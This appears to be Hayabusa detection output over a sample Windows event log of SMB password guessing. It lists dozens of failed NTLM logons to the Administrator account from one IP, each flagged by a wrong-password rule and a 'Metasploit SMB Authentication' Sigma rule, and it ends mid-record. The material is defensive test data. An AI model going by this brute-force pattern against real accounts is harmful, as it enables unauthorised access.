SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rkllnePSq3NQ5wgC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9qLWgQnR7P9cs7s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.359 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C1AdU07nzvv7RB2i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.408 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: cHgiB5SMiQtsl5oD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.452 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 03e7QOn36l0jH35H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.499 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DoJBywV8x8cURwrO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.548 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.583 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SDYGYO6s6g6Dbx8r : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.583 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nUqXpeTNePFyBmCo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.621 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T2h0qJWcbzRe1GSj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: edsfNOovOl1Ow503 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cxCC83XLMIJrNMvl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.740 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MzussOcg5ihdrnD0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.785 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 55l4HKICu8x0FpQv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.891 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 5GmlVWDjZ75tT08G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.891 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o6v1DkuFvB04PESQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.933 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VTLdNb0XbzXuLi51 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.977 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CSjDYb1BhHC9UTxO : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.054 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V1yLH19VsfLx9BGF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.054 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X4AVhjdz9yHsfss0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bqWLOKaKwS8VBxDj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.133 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EjK8A8DTSYursBzj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.181 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UaDCKPslwRaLBWtH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.274 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xAvoekviFDSAIgBe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.274 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.310 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 3XOmFwh8IamESWCM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.310 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 54GbW769j1x27mrI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.394 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bZSkhwZXc1SSknDT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.394 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 05AuqlN44x7oJGoi : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.435 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RQ4A6ReTVTcFCFeN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.482 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T7U6i4CMrL0bHouf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.532 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NaeA4uZ6o8BRbzwf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.626 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MEnlL5BHmlCrtk7p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.626 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KRNMpwAAaTsyzPfR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.669 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oBtHQkRWIoq5hfn7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.709 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 5pkk9lgqMQ4wxQel : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yQVan7kRDOlnim50 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9282GqsC7UiUMbRl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.857 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3lj7GjYryW9wjGgS : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.892 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MPy4iUy5WBSLUBdy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.990 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0kvD9DEuos8SRrLH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.041 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NH1EnMG6fTvcz4QR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.131 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cqHDXSQn8gkl2LJy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.131 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RWI9XDDHjs2xcNB7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zo53mEz6nal5Gxff : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.210 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: jtOgC6wqMoNYVxId : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DdadoJYvD7DYjlSG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.297 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U1xjdqjT9h0KUqG2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.341 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QfkzZBvO4onYx6JZ : IP Address: 192.168.198.149 : AuthPackage: 
